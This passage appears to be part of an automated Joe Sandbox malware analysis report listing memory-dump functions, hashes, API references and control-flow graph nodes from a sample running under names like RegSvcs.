                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714EA98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: c3195f39279d67d830d81a46ff5061a1678d8c9ebd503f45df5edf90a6bb2fd5
                                                • Instruction ID: 3b8e5403e7fe6b98ac27b739a6d20445018224e54d74ff011f6dad8f820edc13
                                                • Opcode Fuzzy Hash: c3195f39279d67d830d81a46ff5061a1678d8c9ebd503f45df5edf90a6bb2fd5
                                                • Instruction Fuzzy Hash: 341125B1D003588FDB20DFAAC4457DEFBF5EF88220F248819D419A7240CB79A945CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029DAED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 029DAF3E
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: cd31a2f5c2fdfcc02bd99ca9f40e9097bfa3d8435bbb19766073a158d87f4833
                                                • Instruction ID: 3e07c14f76340af205ddc4b0a8c005a4bb2cdd0dc3deab0494a2221bbccaeed5
                                                • Opcode Fuzzy Hash: cd31a2f5c2fdfcc02bd99ca9f40e9097bfa3d8435bbb19766073a158d87f4833
                                                • Instruction Fuzzy Hash: A411D2B6D003498FDB20CF9AD444BDEFBF5EB88214F10846AD419A7210D379A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029DAED1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 029DAF3E
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: d5c84cd70fedbc402cedf82b0b7306199e170e57a44d56de11b70bfdb2e8811d
                                                • Instruction ID: b5bb098c1b1d4c5c1331b786ed14906f858be701952eb448da205fdda7819102
                                                • Opcode Fuzzy Hash: d5c84cd70fedbc402cedf82b0b7306199e170e57a44d56de11b70bfdb2e8811d
                                                • Instruction Fuzzy Hash: 6211F0B6C002498FDB10CF9AD544BDEFBF5EF48214F14C46AD419A7210D378A546CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D3D8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 45307c72cff5a4aa90a9a9ff2c3e77d0ce28f6b979f461ebbe76824826288d58
                                                • Instruction ID: a1fd1ea96cba31d675b992e8699a43cf1a9a9decc1ce7a5b7fbd71c6c955d170
                                                • Opcode Fuzzy Hash: 45307c72cff5a4aa90a9a9ff2c3e77d0ce28f6b979f461ebbe76824826288d58
                                                • Instruction Fuzzy Hash: DC2136B1500204DFDF09DF54E9C0B56BB65FBA8724F28C169E8090B656C33AE456CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D4C4 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0d0b9142f29a757a88560701e74a7eb9726e6f58349c7fb045ad94b561dc15a
                                                • Instruction ID: ea73218741be5437e8496fac10e95ce2971e82b5c548f6cd92074f17676c8394
                                                • Opcode Fuzzy Hash: c0d0b9142f29a757a88560701e74a7eb9726e6f58349c7fb045ad94b561dc15a
                                                • Instruction Fuzzy Hash: D8212171600240DFDF09DF54E8C0B26BF71FB98618F24C1A9E8090F256C736D456CAA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115D1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414551843.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_115d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a14aff68fa6392bfac1c72d6575ddea44e16aa15b6b353412bc80d34b66d5dc0
                                                • Instruction ID: 501e8315ffa3494312ca5743e2c48299f7d46d92f30a3675c49cb99500ebb236
                                                • Opcode Fuzzy Hash: a14aff68fa6392bfac1c72d6575ddea44e16aa15b6b353412bc80d34b66d5dc0
                                                • Instruction Fuzzy Hash: 8421D071504304EFDF49DF94E9C0B26BBA5FB88264F20C5ADEC194B252C37AD846CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414551843.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_115d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00c3ae6e05087e65e128a9da7bca2f09edb9093d7e4ef001bab54f2601626549
                                                • Instruction ID: fe20b9efb7cb6f891fd09dc4cbf17be02a5cc269a020764a7d1962958e9b97b7
                                                • Opcode Fuzzy Hash: 00c3ae6e05087e65e128a9da7bca2f09edb9093d7e4ef001bab54f2601626549
                                                • Instruction Fuzzy Hash: 17210071604300DFDF59DF54E8C0B16BB61EB88254F20C5A9DC1A4B252C33AD847CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115D006 Relevance: .1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414551843.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_115d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5223b6cf5b1b291eb77e3c6624ec76b6e3aa022934a0ce09c996c2bc72575bc3
                                                • Instruction ID: 0ae5e610a65e41bda2fd32fa25787a27322b37b8afd5322629b4270885e97530
                                                • Opcode Fuzzy Hash: 5223b6cf5b1b291eb77e3c6624ec76b6e3aa022934a0ce09c996c2bc72575bc3
                                                • Instruction Fuzzy Hash: 0121AC75509380CFDB07CF24D990B15BF71EB46214F28C5EAD8498B2A7C33AD80ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D3D3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: 48845a4a11230f94f750828967b020e54fd58675717301bc8faab85d8dca5560
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: B411CD76404240CFCF06CF54D5C0B56BF61FB94224F2882A9D8090B656C33AE456CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D4BF Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: ff9b669ba18ebadc6234a191f6e8b3588c9ceb47fb2c794a3433996889ac78ac
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 9711CD72504280CFCF06CF54E5C0B16BF71FB98614F2486A9D8490B256C336D456CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0115D1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414551843.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_115d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: b576c4f617dc5bcd94cb4d6a981f36c5a1529dff3cae29adcae2820e3ad07dd8
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: 3711BB75504280DFCB0ACF54D5C0B15BFA1FB84224F24C6ADDC494B296C33AD44ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D745 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6641e9dd90a84e747a0940d546dd9865724de7f9c22ec6553e9c4a180e15665
                                                • Instruction ID: 38331b1c7a417f5a0b3826f51ba7f2199f415b977fe9c5dd49e950d1a9744c9f
                                                • Opcode Fuzzy Hash: d6641e9dd90a84e747a0940d546dd9865724de7f9c22ec6553e9c4a180e15665
                                                • Instruction Fuzzy Hash: D2012B31004B809FFF28CF95DC84B66BFA8DF51A69F14C51AED080E282D3799841CAB7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0114D744 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6982330a6697d0d469ed3d5ef3dcaf6a60c0b72f02c43e1a7b7c33862407fdc8
                                                • Instruction ID: 51033e3415a64a19f7f080bb1476540ec8fd776d73441fd7e46b73e617e27b67
                                                • Opcode Fuzzy Hash: 6982330a6697d0d469ed3d5ef3dcaf6a60c0b72f02c43e1a7b7c33862407fdc8
                                                • Instruction Fuzzy Hash: D8F0C2314047849FFF24CE59D888B62FFA8EB51638F18C05AED084E286C3799844CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:16
                                                Total number of Limit Nodes:3
                                                execution_graph 28525 10a1380 28527 10a1396 28525->28527 28526 10a1484 28527->28526 28529 10a7090 28527->28529 28530 10a709a 28529->28530 28531 10a70b4 28530->28531 28534 5f7cf90 28530->28534 28539 5f7cf7f 28530->28539 28531->28527 28535 5f7cfa5 28534->28535 28536 5f7d1b6 28535->28536 28537 5f7d5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28535->28537 28538 5f7d5e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28535->28538 28536->28531 28537->28535 28538->28535 28540 5f7cfa5 28539->28540 28541 5f7d1b6 28540->28541 28542 5f7d5d3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28540->28542 28543 5f7d5e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28540->28543 28541->28531 28542->28540 28543->28540

                                                Executed Functions

                                                Function 010A9B30 Relevance: 3.1, Instructions: 3140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97988ad934ef57cea960f9f62397ca1a888a4b9ddbf2c7fd105fba54725a9920
                                                • Instruction ID: c05c59a6e657c43d124974b2de25be5c94003d9fed43f88e92ff0994f60eeaaf
                                                • Opcode Fuzzy Hash: 97988ad934ef57cea960f9f62397ca1a888a4b9ddbf2c7fd105fba54725a9920
                                                • Instruction Fuzzy Hash: EE632A31D10A198EDB11EF68C894AA9F7B1FF99300F55D6DAE44877121EB70AAC4CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010ACFA0 Relevance: 2.3, Instructions: 2299COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c252b51f3748d036cb350319672cd39b9224c7795f1ac6457a6a61b471f003e2
                                                • Instruction ID: e04448381728d931205669050a6487426a4cbc40c84f7080055a9f5c67876c66
                                                • Opcode Fuzzy Hash: c252b51f3748d036cb350319672cd39b9224c7795f1ac6457a6a61b471f003e2
                                                • Instruction Fuzzy Hash: A1332031D107198EDB11EFA8C8906ADF7B1FF99300F55C79AD458AB211EB70AAC5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A3E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1912 10a3e80-10a3ee6 1914 10a3ee8-10a3ef3 1912->1914 1915 10a3f30-10a3f32 1912->1915 1914->1915 1917 10a3ef5-10a3f01 1914->1917 1916 10a3f34-10a3f8c 1915->1916 1926 10a3f8e-10a3f99 1916->1926 1927 10a3fd6-10a3fd8 1916->1927 1918 10a3f03-10a3f0d 1917->1918 1919 10a3f24-10a3f2e 1917->1919 1921 10a3f0f 1918->1921 1922 10a3f11-10a3f20 1918->1922 1919->1916 1921->1922 1922->1922 1923 10a3f22 1922->1923 1923->1919 1926->1927 1929 10a3f9b-10a3fa7 1926->1929 1928 10a3fda-10a3ff2 1927->1928 1935 10a403c-10a403e 1928->1935 1936 10a3ff4-10a3fff 1928->1936 1930 10a3fca-10a3fd4 1929->1930 1931 10a3fa9-10a3fb3 1929->1931 1930->1928 1933 10a3fb7-10a3fc6 1931->1933 1934 10a3fb5 1931->1934 1933->1933 1937 10a3fc8 1933->1937 1934->1933 1939 10a4040-10a408e 1935->1939 1936->1935 1938 10a4001-10a400d 1936->1938 1937->1930 1940 10a400f-10a4019 1938->1940 1941 10a4030-10a403a 1938->1941 1947 10a4094-10a40a2 1939->1947 1942 10a401b 1940->1942 1943 10a401d-10a402c 1940->1943 1941->1939 1942->1943 1943->1943 1945 10a402e 1943->1945 1945->1941 1948 10a40ab-10a410b 1947->1948 1949 10a40a4-10a40aa 1947->1949 1956 10a411b-10a411f 1948->1956 1957 10a410d-10a4111 1948->1957 1949->1948 1959 10a412f-10a4133 1956->1959 1960 10a4121-10a4125 1956->1960 1957->1956 1958 10a4113 1957->1958 1958->1956 1962 10a4143-10a4147 1959->1962 1963 10a4135-10a4139 1959->1963 1960->1959 1961 10a4127-10a412a call 10a0ab8 1960->1961 1961->1959 1966 10a4149-10a414d 1962->1966 1967 10a4157-10a415b 1962->1967 1963->1962 1965 10a413b-10a413e call 10a0ab8 1963->1965 1965->1962 1966->1967 1971 10a414f-10a4152 call 10a0ab8 1966->1971 1968 10a416b-10a416f 1967->1968 1969 10a415d-10a4161 1967->1969 1973 10a417f 1968->1973 1974 10a4171-10a4175 1968->1974 1969->1968 1972 10a4163 1969->1972 1971->1967 1972->1968 1977 10a4180 1973->1977 1974->1973 1976 10a4177 1974->1976 1976->1973 1977->1977
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j
                                                • API String ID: 0-4284003065
                                                • Opcode ID: 1f338b998cc056ef050c9bb3ddc6c5343cb2e6884081f99185bd615d5e26dbba
                                                • Instruction ID: 99917dd25411679ba96b57bf965302d1669d003c4a5cbdfe1613c96bcf952d58
                                                • Opcode Fuzzy Hash: 1f338b998cc056ef050c9bb3ddc6c5343cb2e6884081f99185bd615d5e26dbba
                                                • Instruction Fuzzy Hash: 9D915A74E102498FDF50CFA9C9817DEBBF2BF88314F588129E495EB254DB749886CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A9378 Relevance: .6, Instructions: 633COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c7635766dacca2f2a9290aace3f10e03457bf034bb3b72976bab9b0887e9a90
                                                • Instruction ID: d494b9effe88f54369ba59855552a1bf654c6c956b09ed2080567aeac004e41f
                                                • Opcode Fuzzy Hash: 1c7635766dacca2f2a9290aace3f10e03457bf034bb3b72976bab9b0887e9a90
                                                • Instruction Fuzzy Hash: FA329934B002048FDB15DFA8D990AADBBB2FF88314F6485A9E945EB395DB34DC41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A4A98 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39dc0e8ad858c392f1d33f1a6e675d926ed230191c4751079960b60aa959e3c0
                                                • Instruction ID: fe8140b8458afe197bdaa41e18f2faa6f3111fe02cfce36239a3dae1928e9f69
                                                • Opcode Fuzzy Hash: 39dc0e8ad858c392f1d33f1a6e675d926ed230191c4751079960b60aa959e3c0
                                                • Instruction Fuzzy Hash: 37B17D74E002098FDB50DFE8C8817DDBBF2BF88314F588129D858EB254EBB49885CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A4804 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 950 10a4804-10a489c 953 10a489e-10a48a9 950->953 954 10a48e6-10a48e8 950->954 953->954 956 10a48ab-10a48b7 953->956 955 10a48ea-10a4902 954->955 963 10a494c-10a494e 955->963 964 10a4904-10a490f 955->964 957 10a48da-10a48e4 956->957 958 10a48b9-10a48c3 956->958 957->955 959 10a48c7-10a48d6 958->959 960 10a48c5 958->960 959->959 962 10a48d8 959->962 960->959 962->957 966 10a4950-10a4962 963->966 964->963 965 10a4911-10a491d 964->965 967 10a491f-10a4929 965->967 968 10a4940-10a494a 965->968 973 10a4969-10a4995 966->973 970 10a492b 967->970 971 10a492d-10a493c 967->971 968->966 970->971 971->971 972 10a493e 971->972 972->968 974 10a499b-10a49a9 973->974 975 10a49ab-10a49b1 974->975 976 10a49b2-10a4a0f 974->976 975->976 983 10a4a1f-10a4a23 976->983 984 10a4a11-10a4a15 976->984 986 10a4a33-10a4a37 983->986 987 10a4a25-10a4a29 983->987 984->983 985 10a4a17-10a4a1a call 10a0ab8 984->985 985->983 990 10a4a39-10a4a3d 986->990 991 10a4a47-10a4a4b 986->991 987->986 989 10a4a2b-10a4a2e call 10a0ab8 987->989 989->986 990->991 993 10a4a3f 990->993 994 10a4a5b 991->994 995 10a4a4d-10a4a51 991->995 993->991 997 10a4a5c 994->997 995->994 996 10a4a53 995->996 996->994 997->997
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j$\V}j
                                                • API String ID: 0-799745403
                                                • Opcode ID: 57ccbbd059ff6b693312cbf390222fd2ebca4a8c57de7a287bc235f2ea333384
                                                • Instruction ID: 6d27e90f522fc07cfcb3091918bc74fc5b83d79e86451235246267ccf1d62145
                                                • Opcode Fuzzy Hash: 57ccbbd059ff6b693312cbf390222fd2ebca4a8c57de7a287bc235f2ea333384
                                                • Instruction Fuzzy Hash: FD717974E002498FDB10CFE9D8817DEBBF2BF88314F588129E455EB254EBB49846CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 010A4810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 998 10a4810-10a489c 1001 10a489e-10a48a9 998->1001 1002 10a48e6-10a48e8 998->1002 1001->1002 1004 10a48ab-10a48b7 1001->1004 1003 10a48ea-10a4902 1002->1003 1011 10a494c-10a494e 1003->1011 1012 10a4904-10a490f 1003->1012 1005 10a48da-10a48e4 1004->1005 1006 10a48b9-10a48c3 1004->1006 1005->1003 1007 10a48c7-10a48d6 1006->1007 1008 10a48c5 1006->1008 1007->1007 1010 10a48d8 1007->1010 1008->1007 1010->1005 1014 10a4950-10a4995 1011->1014 1012->1011 1013 10a4911-10a491d 1012->1013 1015 10a491f-10a4929 1013->1015 1016 10a4940-10a494a 1013->1016 1022 10a499b-10a49a9 1014->1022 1018 10a492b 1015->1018 1019 10a492d-10a493c 1015->1019 1016->1014 1018->1019 1019->1019 1020 10a493e 1019->1020 1020->1016 1023 10a49ab-10a49b1 1022->1023 1024 10a49b2-10a4a0f 1022->1024 1023->1024 1031 10a4a1f-10a4a23 1024->1031 1032 10a4a11-10a4a15 1024->1032 1034 10a4a33-10a4a37 1031->1034 1035 10a4a25-10a4a29 1031->1035 1032->1031 1033 10a4a17-10a4a1a call 10a0ab8 1032->1033 1033->1031 1038 10a4a39-10a4a3d 1034->1038 1039 10a4a47-10a4a4b 1034->1039 1035->1034 1037 10a4a2b-10a4a2e call 10a0ab8 1035->1037 1037->1034 1038->1039 1041 10a4a3f 1038->1041 1042 10a4a5b 1039->1042 1043 10a4a4d-10a4a51 1039->1043 1041->1039 1045 10a4a5c 1042->1045 1043->1042 1044 10a4a53 1043->1044 1044->1042 1045->1045
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j$\V}j
                                                • API String ID: 0-799745403
                                                • Opcode ID: b774269172f9f0b63b0aaebaf857e7af1e42e30f9ed6f99056d67f19eb4fa82f
                                                • Instruction ID: 79c929c67f6e9fdff0fc014cb9be020a0d6226a47ab52b2a36a9ac703b139ab0
                                                • Opcode Fuzzy Hash: b774269172f9f0b63b0aaebaf857e7af1e42e30f9ed6f99056d67f19eb4fa82f
                                                • Instruction Fuzzy Hash: B7717A74E00249CFDB10CFA9D8907DEBBF2BF88314F588129E455E7254EBB49846CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05F7E1A0 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1793 5f7e1a0-5f7e1ab 1794 5f7e1d5-5f7e1f4 call 5f7d584 1793->1794 1795 5f7e1ad-5f7e1d4 call 5f7d578 1793->1795 1801 5f7e1f6-5f7e1f9 1794->1801 1802 5f7e1fa-5f7e259 1794->1802 1809 5f7e25f-5f7e2ec GlobalMemoryStatusEx 1802->1809 1810 5f7e25b-5f7e25e 1802->1810 1814 5f7e2f5-5f7e31d 1809->1814 1815 5f7e2ee-5f7e2f4 1809->1815 1815->1814
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2542911291.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_5f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 571dd1abd11d18e6df7473d9e410f12bf7beb7457470684b6ac2967dec332645
                                                • Instruction ID: ccd7996bf2a360fca4156159f37facf8e9fb33e03f1ca506d51f5bdfd8eec721
                                                • Opcode Fuzzy Hash: 571dd1abd11d18e6df7473d9e410f12bf7beb7457470684b6ac2967dec332645
                                                • Instruction Fuzzy Hash: E6412032E047598FDB14CFB9C8043AEBBF5EF89210F0485ABD808E7251DB789841CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05F7D584 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1818 5f7d584-5f7e2ec GlobalMemoryStatusEx 1821 5f7e2f5-5f7e31d 1818->1821 1822 5f7e2ee-5f7e2f4 1818->1822 1822->1821
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F7E1F2), ref: 05F7E2DF
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2542911291.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_5f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: fae91d25e6cd376023d0f3bc768d9d996caa66299399eb6f195d459017040c43
                                                • Instruction ID: f5ec2cad5e380324cd20f14c7ddc76826e281039e10e2ef2a6c1507d8e9fd46f
                                                • Opcode Fuzzy Hash: fae91d25e6cd376023d0f3bc768d9d996caa66299399eb6f195d459017040c43
                                                • Instruction Fuzzy Hash: AF1117B1C006599BDB20CFAAC4447EEFBF8FF48210F10816AE918B7240D778A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05F7E270 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1825 5f7e270-5f7e2b6 1827 5f7e2be-5f7e2ec GlobalMemoryStatusEx 1825->1827 1828 5f7e2f5-5f7e31d 1827->1828 1829 5f7e2ee-5f7e2f4 1827->1829 1829->1828
                                                APIs
